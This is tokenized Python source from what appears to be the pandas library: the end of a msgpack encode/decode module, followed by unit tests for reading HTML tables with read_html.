<EOL> u'<STR_LIT>' : compressor } <EOL> elif isinstance ( obj , np . number ) : <EOL> if np . iscomplexobj ( obj ) : <EOL> return { u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : u ( obj . dtype . name ) , <EOL> u'<STR_LIT>' : u ( obj . real . __repr__ ( ) ) , <EOL> u'<STR_LIT>' : u ( obj . imag . __repr__ ( ) ) } <EOL> else : <EOL> return { u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : u ( obj . dtype . name ) , <EOL> u'<STR_LIT:data>' : u ( obj . __repr__ ( ) ) } <EOL> elif isinstance ( obj , complex ) : <EOL> return { u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : u ( obj . real . __repr__ ( ) ) , <EOL> u'<STR_LIT>' : u ( obj . imag . __repr__ ( ) ) } <EOL> return obj <EOL> def decode ( obj ) : <EOL> """<STR_LIT>""" <EOL> typ = obj . get ( u'<STR_LIT>' ) <EOL> if typ is None : <EOL> return obj <EOL> elif typ == u'<STR_LIT>' : <EOL> return Timestamp ( obj [ u'<STR_LIT:value>' ] , tz = obj [ u'<STR_LIT>' ] , offset = obj [ u'<STR_LIT>' ] ) <EOL> elif typ == u'<STR_LIT>' : <EOL> return NaT <EOL> elif typ == u'<STR_LIT>' : <EOL> return Period ( ordinal = obj [ u'<STR_LIT>' ] , freq = obj [ u'<STR_LIT>' ] ) <EOL> elif typ == u'<STR_LIT:index>' : <EOL> dtype = dtype_for ( obj [ u'<STR_LIT>' ] ) <EOL> data = unconvert ( obj [ u'<STR_LIT:data>' ] , dtype , <EOL> obj . get ( u'<STR_LIT>' ) ) <EOL> return globals ( ) [ obj [ u'<STR_LIT>' ] ] ( data , dtype = dtype , name = obj [ u'<STR_LIT:name>' ] ) <EOL> elif typ == u'<STR_LIT>' : <EOL> return globals ( ) [ obj [ u'<STR_LIT>' ] ] ( obj [ u'<STR_LIT:start>' ] , <EOL> obj [ u'<STR_LIT>' ] , <EOL> obj [ u'<STR_LIT>' ] , <EOL> name = obj [ u'<STR_LIT:name>' ] ) <EOL> elif typ == u'<STR_LIT>' : <EOL> dtype = dtype_for ( obj [ u'<STR_LIT>' ] ) <EOL> data = unconvert ( obj [ u'<STR_LIT:data>' ] , dtype , <EOL> obj . get ( u'<STR_LIT>' ) ) <EOL> data = [ tuple ( x ) for x in data ] <EOL> return globals ( ) [ obj [ u'<STR_LIT>' ] ] . from_tuples ( data , names = obj [ u'<STR_LIT>' ] ) <EOL> elif typ == u'<STR_LIT>' : <EOL> data = unconvert ( obj [ u'<STR_LIT:data>' ] , np . int64 , obj . get ( u'<STR_LIT>' ) ) <EOL> d = dict ( name = obj [ u'<STR_LIT:name>' ] , freq = obj [ u'<STR_LIT>' ] ) <EOL> return globals ( ) [ obj [ u'<STR_LIT>' ] ] ( data , ** d ) <EOL> elif typ == u'<STR_LIT>' : <EOL> data = unconvert ( obj [ u'<STR_LIT:data>' ] , np . int64 , obj . get ( u'<STR_LIT>' ) ) <EOL> d = dict ( name = obj [ u'<STR_LIT:name>' ] , freq = obj [ u'<STR_LIT>' ] , verify_integrity = False ) <EOL> result = globals ( ) [ obj [ u'<STR_LIT>' ] ] ( data , ** d ) <EOL> tz = obj [ u'<STR_LIT>' ] <EOL> if tz is not None : <EOL> result = result . tz_localize ( '<STR_LIT>' ) . tz_convert ( tz ) <EOL> return result <EOL> elif typ == u'<STR_LIT>' : <EOL> from_codes = globals ( ) [ obj [ u'<STR_LIT>' ] ] . from_codes <EOL> return from_codes ( codes = obj [ u'<STR_LIT>' ] , <EOL> categories = obj [ u'<STR_LIT>' ] , <EOL> ordered = obj [ u'<STR_LIT>' ] , <EOL> name = obj [ u'<STR_LIT:name>' ] ) <EOL> elif typ == u'<STR_LIT>' : <EOL> dtype = dtype_for ( obj [ u'<STR_LIT>' ] ) <EOL> pd_dtype = pandas_dtype ( dtype ) <EOL> np_dtype = pandas_dtype ( dtype ) . base <EOL> index = obj [ u'<STR_LIT:index>' ] <EOL> result = globals ( ) [ obj [ u'<STR_LIT>' ] ] ( unconvert ( obj [ u'<STR_LIT:data>' ] , dtype , <EOL> obj [ u'<STR_LIT>' ] ) , <EOL> index = index , <EOL> dtype = np_dtype , <EOL> name = obj [ u'<STR_LIT:name>' ] ) <EOL> tz = getattr ( pd_dtype , '<STR_LIT>' , None ) <EOL> if tz : <EOL> result = result . dt . tz_localize ( '<STR_LIT>' ) . dt . tz_convert ( tz ) <EOL> return result <EOL> elif typ == u'<STR_LIT>' : <EOL> axes = obj [ u'<STR_LIT>' ] <EOL> def create_block ( b ) : <EOL> values = unconvert ( b [ u'<STR_LIT>' ] , dtype_for ( b [ u'<STR_LIT>' ] ) , <EOL> b [ u'<STR_LIT>' ] ) . reshape ( b [ u'<STR_LIT>' ] ) <EOL> if u'<STR_LIT>' in b : <EOL> placement = b [ u'<STR_LIT>' ] <EOL> else : <EOL> placement = axes [ <NUM_LIT:0> ] . get_indexer ( b [ u'<STR_LIT>' ] ) <EOL> return make_block ( values = values , <EOL> klass = getattr ( internals , b [ u'<STR_LIT>' ] ) , <EOL> placement = placement , <EOL> dtype = b [ u'<STR_LIT>' ] ) <EOL> blocks = [ create_block ( b ) for b in obj [ u'<STR_LIT>' ] ] <EOL> return globals ( ) [ obj [ u'<STR_LIT>' ] ] ( BlockManager ( blocks , axes ) ) <EOL> elif typ == u'<STR_LIT>' : <EOL> return parse ( obj [ u'<STR_LIT:data>' ] ) <EOL> elif typ == u'<STR_LIT>' : <EOL> return np . datetime64 ( parse ( obj [ u'<STR_LIT:data>' ] ) ) <EOL> elif typ == u'<STR_LIT:date>' : <EOL> return parse ( obj [ u'<STR_LIT:data>' ] ) . date ( ) <EOL> elif typ == u'<STR_LIT>' : <EOL> return timedelta ( * obj [ u'<STR_LIT:data>' ] ) <EOL> elif typ == u'<STR_LIT>' : <EOL> return np . timedelta64 ( int ( obj [ u'<STR_LIT:data>' ] ) ) <EOL> elif typ == u'<STR_LIT>' : <EOL> return globals ( ) [ obj [ u'<STR_LIT>' ] ] ( obj [ u'<STR_LIT>' ] , obj [ u'<STR_LIT>' ] , <EOL> obj [ u'<STR_LIT>' ] ) <EOL> elif typ == u'<STR_LIT>' : <EOL> return globals ( ) [ obj [ u'<STR_LIT>' ] ] ( obj [ u'<STR_LIT>' ] , obj [ u'<STR_LIT>' ] ) <EOL> elif typ == u'<STR_LIT>' : <EOL> return unconvert ( obj [ u'<STR_LIT:data>' ] , np . typeDict [ obj [ u'<STR_LIT>' ] ] , <EOL> obj . get ( u'<STR_LIT>' ) ) . reshape ( obj [ u'<STR_LIT>' ] ) <EOL> elif typ == u'<STR_LIT>' : <EOL> if obj . get ( u'<STR_LIT>' ) == u'<STR_LIT>' : <EOL> return c2f ( obj [ u'<STR_LIT>' ] , obj [ u'<STR_LIT>' ] , obj [ u'<STR_LIT>' ] ) <EOL> else : <EOL> dtype = dtype_for ( obj [ u'<STR_LIT>' ] ) <EOL> try : <EOL> return dtype ( obj [ u'<STR_LIT:data>' ] ) <EOL> except : <EOL> return dtype . type ( obj [ u'<STR_LIT:data>' ] ) <EOL> elif typ == u'<STR_LIT>' : <EOL> return complex ( obj [ u'<STR_LIT>' ] + u'<STR_LIT:+>' + obj [ u'<STR_LIT>' ] + u'<STR_LIT>' ) <EOL> elif isinstance ( obj , ( dict , list , set ) ) : <EOL> return obj <EOL> else : <EOL> return obj <EOL> def pack ( o , default = encode , <EOL> encoding = '<STR_LIT:utf-8>' , unicode_errors = '<STR_LIT:strict>' , use_single_float = False , <EOL> autoreset = <NUM_LIT:1> , use_bin_type = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> return Packer ( default = default , encoding = encoding , <EOL> unicode_errors = unicode_errors , <EOL> use_single_float = use_single_float , <EOL> autoreset = autoreset , <EOL> use_bin_type = use_bin_type ) . pack ( o ) <EOL> def unpack ( packed , object_hook = decode , <EOL> list_hook = None , use_list = False , encoding = '<STR_LIT:utf-8>' , <EOL> unicode_errors = '<STR_LIT:strict>' , object_pairs_hook = None , <EOL> max_buffer_size = <NUM_LIT:0> , ext_hook = ExtType ) : <EOL> """<STR_LIT>""" <EOL> return Unpacker ( packed , object_hook = object_hook , <EOL> list_hook = list_hook , <EOL> use_list = use_list , encoding = encoding , <EOL> unicode_errors = unicode_errors , <EOL> object_pairs_hook = object_pairs_hook , <EOL> max_buffer_size = max_buffer_size , <EOL> ext_hook = ext_hook ) <EOL> class Packer ( _Packer ) : <EOL> def __init__ ( self , default = encode , <EOL> encoding = '<STR_LIT:utf-8>' , <EOL> unicode_errors = '<STR_LIT:strict>' , <EOL> use_single_float = False , <EOL> autoreset = <NUM_LIT:1> , <EOL> use_bin_type = <NUM_LIT:1> ) : <EOL> super ( Packer , self ) . __init__ ( default = default , <EOL> encoding = encoding , <EOL> unicode_errors = unicode_errors , <EOL> use_single_float = use_single_float , <EOL> autoreset = autoreset , <EOL> use_bin_type = use_bin_type ) <EOL> class Unpacker ( _Unpacker ) : <EOL> def __init__ ( self , file_like = None , read_size = <NUM_LIT:0> , use_list = False , <EOL> object_hook = decode , <EOL> object_pairs_hook = None , list_hook = None , encoding = '<STR_LIT:utf-8>' , <EOL> unicode_errors = '<STR_LIT:strict>' , max_buffer_size = <NUM_LIT:0> , ext_hook = ExtType ) : <EOL> super ( Unpacker , self ) . __init__ ( file_like = file_like , <EOL> read_size = read_size , <EOL> use_list = use_list , <EOL> object_hook = object_hook , <EOL> object_pairs_hook = object_pairs_hook , <EOL> list_hook = list_hook , <EOL> encoding = encoding , <EOL> unicode_errors = unicode_errors , <EOL> max_buffer_size = max_buffer_size , <EOL> ext_hook = ext_hook ) <EOL> class Iterator ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , path , ** kwargs ) : <EOL> self . path = path <EOL> self . kwargs = kwargs <EOL> def __iter__ ( self ) : <EOL> needs_closing = True <EOL> try : <EOL> if isinstance ( self . path , compat . string_types ) : <EOL> try : <EOL> path_exists = os . path . exists ( self . path ) <EOL> except TypeError : <EOL> path_exists = False <EOL> if path_exists : <EOL> fh = open ( self . path , '<STR_LIT:rb>' ) <EOL> else : <EOL> fh = compat . BytesIO ( self . path ) <EOL> else : <EOL> if not hasattr ( self . path , '<STR_LIT>' ) : <EOL> fh = compat . BytesIO ( self . path ) <EOL> else : <EOL> needs_closing = False <EOL> fh = self . path <EOL> unpacker = unpack ( fh ) <EOL> for o in unpacker : <EOL> yield o <EOL> finally : <EOL> if needs_closing : <EOL> fh . close ( ) </s>
<s> from __future__ import print_function <EOL> import glob <EOL> import os <EOL> import re <EOL> import warnings <EOL> try : <EOL> from importlib import import_module <EOL> except ImportError : <EOL> import_module = __import__ <EOL> from distutils . version import LooseVersion <EOL> import nose <EOL> import numpy as np <EOL> from numpy . random import rand <EOL> from numpy . testing . decorators import slow <EOL> from pandas import ( DataFrame , MultiIndex , read_csv , Timestamp , Index , <EOL> date_range , Series ) <EOL> from pandas . compat import ( map , zip , StringIO , string_types , BytesIO , <EOL> is_platform_windows ) <EOL> from pandas . io . common import URLError , urlopen , file_path_to_url <EOL> from pandas . io . html import read_html <EOL> from pandas . parser import CParserError <EOL> import pandas . util . testing as tm <EOL> from pandas . util . testing import makeCustomDataframe as mkdf , network <EOL> def _have_module ( module_name ) : <EOL> try : <EOL> import_module ( module_name ) <EOL> return True <EOL> except ImportError : <EOL> return False <EOL> def _skip_if_no ( module_name ) : <EOL> if not _have_module ( module_name ) : <EOL> raise nose . SkipTest ( "<STR_LIT>" . format ( module_name ) ) <EOL> def _skip_if_none_of ( module_names ) : <EOL> if isinstance ( module_names , string_types ) : <EOL> _skip_if_no ( module_names ) <EOL> if module_names == '<STR_LIT>' : <EOL> import bs4 <EOL> if bs4 . __version__ == LooseVersion ( '<STR_LIT>' ) : <EOL> raise nose . SkipTest ( "<STR_LIT>" ) <EOL> else : <EOL> not_found = [ module_name for module_name in module_names if not <EOL> _have_module ( module_name ) ] <EOL> if set ( not_found ) & set ( module_names ) : <EOL> raise nose . SkipTest ( "<STR_LIT>" . format ( not_found ) ) <EOL> if '<STR_LIT>' in module_names : <EOL> import bs4 <EOL> if bs4 . __version__ == LooseVersion ( '<STR_LIT>' ) : <EOL> raise nose . SkipTest ( "<STR_LIT>" ) <EOL> DATA_PATH = tm . get_data_path ( ) <EOL> def assert_framelist_equal ( list1 , list2 , * args , ** kwargs ) : <EOL> assert len ( list1 ) == len ( list2 ) , ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( len ( list1 ) , <EOL> len ( list2 ) ) ) <EOL> msg = '<STR_LIT>' <EOL> both_frames = all ( map ( lambda x , y : isinstance ( x , DataFrame ) and <EOL> isinstance ( y , DataFrame ) , list1 , list2 ) ) <EOL> assert both_frames , msg <EOL> for frame_i , frame_j in zip ( list1 , list2 ) : <EOL> tm . assert_frame_equal ( frame_i , frame_j , * args , ** kwargs ) <EOL> assert not frame_i . empty , '<STR_LIT>' <EOL> def test_bs4_version_fails ( ) : <EOL> _skip_if_none_of ( ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> import bs4 <EOL> if bs4 . __version__ == LooseVersion ( '<STR_LIT>' ) : <EOL> tm . assert_raises ( AssertionError , read_html , os . path . join ( DATA_PATH , <EOL> "<STR_LIT>" ) , <EOL> flavor = '<STR_LIT>' ) <EOL> class ReadHtmlMixin ( object ) : <EOL> def read_html ( self , * args , ** kwargs ) : <EOL> kwargs . setdefault ( '<STR_LIT>' , self . flavor ) <EOL> return read_html ( * args , ** kwargs ) <EOL> class TestReadHtml ( tm . TestCase , ReadHtmlMixin ) : <EOL> flavor = '<STR_LIT>' <EOL> spam_data = os . path . join ( DATA_PATH , '<STR_LIT>' ) <EOL> banklist_data = os . path . join ( DATA_PATH , '<STR_LIT>' ) <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> super ( TestReadHtml , cls ) . setUpClass ( ) <EOL> _skip_if_none_of ( ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> def test_to_html_compat ( self ) : <EOL> df = mkdf ( <NUM_LIT:4> , <NUM_LIT:3> , data_gen_f = lambda * args : rand ( ) , c_idx_names = False , <EOL> r_idx_names = False ) . applymap ( '<STR_LIT>' . format ) . astype ( float ) <EOL> out = df . to_html ( ) <EOL> res = self . read_html ( out , attrs = { '<STR_LIT:class>' : '<STR_LIT>' } , index_col = <NUM_LIT:0> ) [ <NUM_LIT:0> ] <EOL> tm . assert_frame_equal ( res , df ) <EOL> @ network <EOL> def test_banklist_url ( self ) : <EOL> url = '<STR_LIT>' <EOL> df1 = self . read_html ( url , '<STR_LIT>' , <EOL> attrs = { "<STR_LIT:id>" : '<STR_LIT>' } ) <EOL> df2 = self . read_html ( url , '<STR_LIT>' , attrs = { '<STR_LIT:id>' : '<STR_LIT>' } ) <EOL> assert_framelist_equal ( df1 , df2 ) <EOL> @ network <EOL> def test_spam_url ( self ) : <EOL> url = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> df1 = self . read_html ( url , '<STR_LIT>' ) <EOL> df2 = self . read_html ( url , '<STR_LIT>' ) <EOL> assert_framelist_equal ( df1 , df2 ) <EOL> @ slow <EOL> def test_banklist ( self ) : <EOL> df1 = self . read_html ( self . banklist_data , '<STR_LIT>' , <EOL> attrs = { '<STR_LIT:id>' : '<STR_LIT>' } ) <EOL> df2 = self . read_html ( self . banklist_data , '<STR_LIT>' , <EOL> attrs = { '<STR_LIT:id>' : '<STR_LIT>' } ) <EOL> assert_framelist_equal ( df1 , df2 ) <EOL> def test_spam_no_types ( self ) : <EOL> df1 = self . read_html ( self . spam_data , '<STR_LIT>' ) <EOL> df2 = self . read_html ( self . spam_data , '<STR_LIT>' ) <EOL> assert_framelist_equal ( df1 , df2 ) <EOL> self . assertEqual ( df1 [ <NUM_LIT:0> ] . ix [ <NUM_LIT:0> , <NUM_LIT:0> ] , '<STR_LIT>' ) <EOL> self . assertEqual ( df1 [ <NUM_LIT:0> ] . columns [ <NUM_LIT:0> ] , '<STR_LIT>' ) <EOL> def test_spam_with_types ( self ) : <EOL> df1 = self . read_html ( self . spam_data , '<STR_LIT>' ) <EOL> df2 = self . read_html ( self . spam_data , '<STR_LIT>' ) <EOL> assert_framelist_equal ( df1 , df2 ) <EOL> self . assertEqual ( df1 [ <NUM_LIT:0> ] . ix [ <NUM_LIT:0> , <NUM_LIT:0> ] , '<STR_LIT>' ) <EOL> self . assertEqual ( df1 [ <NUM_LIT:0> ] . columns [ <NUM_LIT:0> ] , '<STR_LIT>' ) <EOL> def test_spam_no_match ( self ) : <EOL> dfs = self . read_html ( self . spam_data ) <EOL> for df in dfs : <EOL> tm . assertIsInstance ( df , DataFrame ) <EOL> def test_banklist_no_match ( self ) : <EOL> dfs = self . read_html ( self . banklist_data , attrs = { '<STR_LIT:id>' : '<STR_LIT>' } ) <EOL> for df in dfs : <EOL> tm . assertIsInstance ( df , DataFrame ) <EOL> def test_spam_header ( self ) : <EOL> df = self . read_html ( self . spam_data , '<STR_LIT>' , header = <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> self . assertEqual ( df . columns [ <NUM_LIT:0> ] , '<STR_LIT>' ) <EOL> self . assertFalse ( df . empty ) <EOL> def test_skiprows_int ( self ) : <EOL> df1 = self . read_html ( self . spam_data , '<STR_LIT>' , skiprows = <NUM_LIT:1> ) <EOL> df2 = self . read_html ( self . spam_data , '<STR_LIT>' , skiprows = <NUM_LIT:1> ) <EOL> assert_framelist_equal ( df1 , df2 ) <EOL> def test_skiprows_xrange ( self ) : <EOL> df1 = self . read_html ( self . spam_data , '<STR_LIT>' , skiprows = range ( <NUM_LIT:2> ) ) [ <NUM_LIT:0> ] <EOL> df2 = self . read_html ( self . spam_data , '<STR_LIT>' , skiprows = range ( <NUM_LIT:2> ) ) [ <NUM_LIT:0> ] <EOL> tm . assert_frame_equal ( df1 , df2 ) <EOL> def test_skiprows_list ( self ) : <EOL> df1 = self . read_html ( self . spam_data , '<STR_LIT>' , skiprows = [ <NUM_LIT:1> , <NUM_LIT:2> ] ) <EOL> df2 = self . read_html ( self . spam_data , '<STR_LIT>' , skiprows = [ <NUM_LIT:2> , <NUM_LIT:1> ] ) <EOL> assert_framelist_equal ( df1 , df2 ) <EOL> def test_skiprows_set ( self ) : <EOL> df1 = self . read_html ( self . spam_data , '<STR_LIT>' , skiprows = set ( [ <NUM_LIT:1> , <NUM_LIT:2> ] ) ) <EOL> df2 = self . read_html ( self . spam_data , '<STR_LIT>' , skiprows = set ( [ <NUM_LIT:2> , <NUM_LIT:1> ] ) ) <EOL> assert_framelist_equal ( df1 , df2 ) <EOL> def test_skiprows_slice ( self ) : <EOL> df1 = self . read_html ( self . spam_data , '<STR_LIT>' , skiprows = <NUM_LIT:1> ) <EOL> df2 = self . read_html ( self . spam_data , '<STR_LIT>' , skiprows = <NUM_LIT:1> ) <EOL> assert_framelist_equal ( df1 , df2 ) <EOL> def test_skiprows_slice_short ( self ) : <EOL> df1 = self . read_html ( self . spam_data , '<STR_LIT>' , skiprows = slice ( <NUM_LIT:2> ) ) <EOL> df2 = self . read_html ( self . spam_data , '<STR_LIT>' , skiprows = slice ( <NUM_LIT:2> ) ) <EOL> assert_framelist_equal ( df1 , df2 ) <EOL> def test_skiprows_slice_long ( self ) : <EOL> df1 = self . read_html ( self . spam_data , '<STR_LIT>' , skiprows = slice ( <NUM_LIT:2> , <NUM_LIT:5> ) ) <EOL> df2 = self . read_html ( self . spam_data , '<STR_LIT>' , skiprows = slice ( <NUM_LIT:4> , <NUM_LIT:1> , - <NUM_LIT:1> ) ) <EOL> assert_framelist_equal ( df1 , df2 ) <EOL> def test_skiprows_ndarray ( self ) : <EOL> df1 = self . read_html ( self . spam_data , '<STR_LIT>' , <EOL> skiprows = np . arange ( <NUM_LIT:2> ) ) <EOL> df2 = self . read_html ( self . spam_data , '<STR_LIT>' , skiprows = np . arange ( <NUM_LIT:2> ) ) <EOL> assert_framelist_equal ( df1 , df2 ) <EOL> def test_skiprows_invalid ( self ) : <EOL> with tm . assertRaisesRegexp ( TypeError , <EOL> '<STR_LIT>' ) : <EOL> self . read_html ( self . spam_data , '<STR_LIT>' , skiprows = '<STR_LIT>' ) <EOL> def test_index ( self ) : <EOL> df1 = self . read_html ( self . spam_data , '<STR_LIT>' , index_col = <NUM_LIT:0> ) <EOL> df2 = self . read_html ( self . spam_data , '<STR_LIT>' , index_col = <NUM_LIT:0> ) <EOL> assert_framelist_equal ( df1 , df2 ) <EOL> def test_header_and_index_no_types ( self ) : <EOL> df1 = self . read_html ( self . spam_data , '<STR_LIT>' , header = <NUM_LIT:1> , <EOL> index_col = <NUM_LIT:0> ) <EOL> df2 = self . read_html ( self . spam_data , '<STR_LIT>' , header = <NUM_LIT:1> , index_col = <NUM_LIT:0> ) <EOL> assert_framelist_equal ( df1 , df2 ) <EOL> def test_header_and_index_with_types ( self ) : <EOL> df1 = self . read_html ( self . spam_data , '<STR_LIT>' , header = <NUM_LIT:1> , <EOL> index_col = <NUM_LIT:0> ) <EOL> df2 = self . read_html ( self . spam_data , '<STR_LIT>' , header = <NUM_LIT:1> , index_col = <NUM_LIT:0> ) <EOL> assert_framelist_equal ( df1 , df2 ) <EOL> def test_infer_types ( self ) : <EOL> df1 = self . read_html ( self . spam_data , '<STR_LIT>' , index_col = <NUM_LIT:0> ) <EOL> df2 = self . read_html ( self . spam_data , '<STR_LIT>' , index_col = <NUM_LIT:0> ) <EOL> assert_framelist_equal ( df1 , df2 ) <EOL> def test_string_io ( self ) : <EOL> with open ( self . spam_data ) as f : <EOL> data1 = StringIO ( f . read ( ) ) <EOL> with open ( self . spam_data ) as f : <EOL> data2 = StringIO ( f . read ( ) ) <EOL> df1 = self . read_html ( data1 , '<STR_LIT>' ) <EOL> df2 = self . read_html ( data2 , '<STR_LIT>' ) <EOL> assert_framelist_equal ( df1 , df2 ) <EOL> def test_string ( self ) : <EOL> with open ( self . spam_data ) as f : <EOL> data = f . read ( ) <EOL> df1 = self . read_html ( data , '<STR_LIT>' ) <EOL> df2 = self . read_html ( data , '<STR_LIT>' ) <EOL> assert_framelist_equal ( df1 , df2 ) <EOL> def test_file_like ( self ) : <EOL> with open ( self . spam_data ) as f : <EOL> df1 = self . read_html ( f , '<STR_LIT>' ) <EOL> with open ( self . spam_data ) as f : <EOL> df2 = self . read_html ( f , '<STR_LIT>' ) <EOL> assert_framelist_equal ( df1 , df2 ) <EOL> @ network <EOL> def test_bad_url_protocol ( self ) : <EOL> with tm . assertRaises ( URLError ) : <EOL> self . read_html ( '<STR_LIT>' , match = '<STR_LIT>' ) <EOL> @ network <EOL> def test_invalid_url ( self ) : <EOL> try : <EOL> with tm . assertRaises ( URLError ) : <EOL> self . read_html ( '<STR_LIT>' , <EOL> match = '<STR_LIT>' ) <EOL> except ValueError as e : <EOL> tm . assert_equal ( str ( e ) , '<STR_LIT>' ) <EOL> @ slow <EOL> def test_file_url ( self ) : <EOL> url = self . banklist_data <EOL> dfs = self . read_html ( file_path_to_url ( url ) , '<STR_LIT>' , <EOL> attrs = { '<STR_LIT:id>' : '<STR_LIT>' } ) <EOL> tm . assertIsInstance ( dfs , list ) <EOL> for df in dfs : <EOL> tm . assertIsInstance ( df , DataFrame ) <EOL> @ slow <EOL> def test_invalid_table_attrs ( self ) : <EOL> url = self . banklist_data <EOL> with tm . assertRaisesRegexp ( ValueError , '<STR_LIT>' ) : <EOL> self . read_html ( url , '<STR_LIT>' , <EOL> attrs = { '<STR_LIT:id>' : '<STR_LIT>' } ) <EOL> def _bank_data ( self , * args , ** kwargs ) : <EOL> return self . read_html ( self . banklist_data , '<STR_LIT>' , <EOL> attrs = { '<STR_LIT:id>' : '<STR_LIT>' } , * args , ** kwargs ) <EOL> @ slow <EOL> def test_multiindex_header ( self ) : <EOL> df = self . _bank_data ( header = [ <NUM_LIT:0> , <NUM_LIT:1> ] ) [ <NUM_LIT:0> ] <EOL> tm . assertIsInstance ( df . columns , MultiIndex ) <EOL> @ slow <EOL> def test_multiindex_index ( self ) : <EOL> df = self . _bank_data ( index_col = [ <NUM_LIT:0> , <NUM_LIT:1> ] ) [ <NUM_LIT:0> ] <EOL> tm . assertIsInstance ( df . index , MultiIndex ) <EOL> @ slow <EOL> def test_multiindex_header_index ( self ) : <EOL> df = self . _bank_data ( header = [ <NUM_LIT:0> , <NUM_LIT:1> ] , index_col = [ <NUM_LIT:0> , <NUM_LIT:1> ] ) [ <NUM_LIT:0> ] <EOL> tm . assertIsInstance ( df . columns , MultiIndex ) <EOL> tm . assertIsInstance ( df . index , MultiIndex ) <EOL> @ slow <EOL> def test_multiindex_header_skiprows_tuples ( self ) : <EOL> df = self . _bank_data ( header = [ <NUM_LIT:0> , <NUM_LIT:1> ] , skiprows = <NUM_LIT:1> , tupleize_cols = True ) [ <NUM_LIT:0> ] <EOL> tm . assertIsInstance ( df . columns , Index ) <EOL> @ slow <EOL> def test_multiindex_header_skiprows ( self ) : <EOL> df = self . _bank_data ( header = [ <NUM_LIT:0> , <NUM_LIT:1> ] , skiprows = <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> tm . assertIsInstance ( df . columns , MultiIndex ) <EOL> @ slow <EOL> def test_multiindex_header_index_skiprows ( self ) : <EOL> df = self . _bank_data ( header = [ <NUM_LIT:0> , <NUM_LIT:1> ] , index_col = [ <NUM_LIT:0> , <NUM_LIT:1> ] , skiprows = <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> tm . assertIsInstance ( df . index , MultiIndex ) <EOL> tm . assertIsInstance ( df . columns , MultiIndex ) <EOL> @ slow <EOL> def test_regex_idempotency ( self ) : <EOL> url = self . banklist_data <EOL> dfs = self . read_html ( file_path_to_url ( url ) , <EOL> match = re . compile ( re . compile ( '<STR_LIT>' ) ) , <EOL> attrs = { '<STR_LIT:id>' : '<STR_LIT>' } ) <EOL> tm . assertIsInstance ( dfs , list ) <EOL> for df in dfs : <EOL> tm . assertIsInstance ( df , DataFrame ) <EOL> def test_negative_skiprows ( self ) : <EOL> with tm . assertRaisesRegexp ( ValueError , <EOL> '<STR_LIT>' ) : <EOL> self . read_html ( self . spam_data , '<STR_LIT>' , skiprows = - <NUM_LIT:1> ) <EOL> @ network <EOL> def test_multiple_matches ( self ) : <EOL> url = '<STR_LIT>' <EOL> dfs = self . read_html ( url , match = '<STR_LIT>' ) <EOL> self . assertTrue ( len ( dfs ) > <NUM_LIT:1> ) <EOL> @ network <EOL> def test_python_docs_table ( self ) : <EOL> url = '<STR_LIT>' <EOL> dfs = self . read_html ( url , match = '<STR_LIT>' ) <EOL> zz = [ df . iloc [ <NUM_LIT:0> , <NUM_LIT:0> ] [ <NUM_LIT:0> : <NUM_LIT:4> ] for df in dfs ] <EOL> self . assertEqual ( sorted ( zz ) , sorted ( [ '<STR_LIT>' , '<STR_LIT>' ] ) ) <EOL> @ slow <EOL> def test_thousands_macau_stats ( self ) : <EOL> all_non_nan_table_index = - <NUM_LIT:2> <EOL> macau_data = os . path . join ( DATA_PATH , '<STR_LIT>' ) <EOL> dfs = self . read_html ( macau_data , index_col = <NUM_LIT:0> , <EOL> attrs = { '<STR_LIT:class>' : '<STR_LIT>' } ) <EOL> df = dfs [ all_non_nan_table_index ] <EOL> self . assertFalse ( any ( s . isnull ( ) . any ( ) for _ , s in df . iteritems ( ) ) ) <EOL> @ slow <EOL> def test_thousands_macau_index_col ( self ) : <EOL> all_non_nan_table_index = - <NUM_LIT:2> <EOL> macau_data = os . path . join ( DATA_PATH , '<STR_LIT>' ) <EOL> dfs = self . read_html ( macau_data , index_col = <NUM_LIT:0> , header = <NUM_LIT:0> ) <EOL> df = dfs [ all_non_nan_table_index ] <EOL> self . assertFalse ( any ( s . isnull ( ) . any ( ) for _ , s in df . iteritems ( ) ) ) <EOL> def test_empty_tables ( self ) : <EOL> """<STR_LIT>""" <EOL> data1 = '''<STR_LIT>''' <EOL> data2 = data1 + '''<STR_LIT>''' <EOL> res1 = self . read_html ( StringIO ( data1 ) ) <EOL> res2 = self . read_html ( StringIO ( data2 ) ) <EOL> assert_framelist_equal ( res1 , res2 ) <EOL> def test_header_and_one_column ( self ) : <EOL> """<STR_LIT>""" <EOL> data = StringIO ( '''<STR_LIT>''' ) <EOL> expected = DataFrame ( data = { '<STR_LIT>' : '<STR_LIT>' } , index = [ <NUM_LIT:0> ] ) <EOL> result = self . read_html ( data ) [ <NUM_LIT:0> ] <EOL> tm . assert_frame_equal ( result , expected ) <EOL> def test_tfoot_read ( self ) : <EOL> """<STR_LIT>""" <EOL> data_template = '''<STR_LIT>''' <EOL> data1 = data_template . format ( footer = "<STR_LIT>" ) <EOL> data2 = data_template . format ( <EOL> footer = "<STR_LIT>" ) <EOL> d1 = { '<STR_LIT:A>' : [ '<STR_LIT>' ] , '<STR_LIT:B>' : [ '<STR_LIT>' ] } <EOL> d2 = { '<STR_LIT:A>' : [ '<STR_LIT>' , '<STR_LIT>' ] , '<STR_LIT:B>' : [ '<STR_LIT>' , '<STR_LIT>' ] } <EOL> tm . assert_frame_equal ( self . read_html ( data1 ) [ <NUM_LIT:0> ] , DataFrame ( d1 ) ) <EOL> tm . assert_frame_equal ( self . read_html ( data2 ) [ <NUM_LIT:0> ] , DataFrame ( d2 ) ) <EOL> def test_countries_municipalities ( self ) : <EOL> data1 = StringIO ( '''<STR_LIT>''' ) <EOL> data2 = StringIO ( '''<STR_LIT>''' ) <EOL> res1 = self . read_html ( data1 ) <EOL> res2 = self . read_html ( data2 , header = <NUM_LIT:0> ) <EOL> 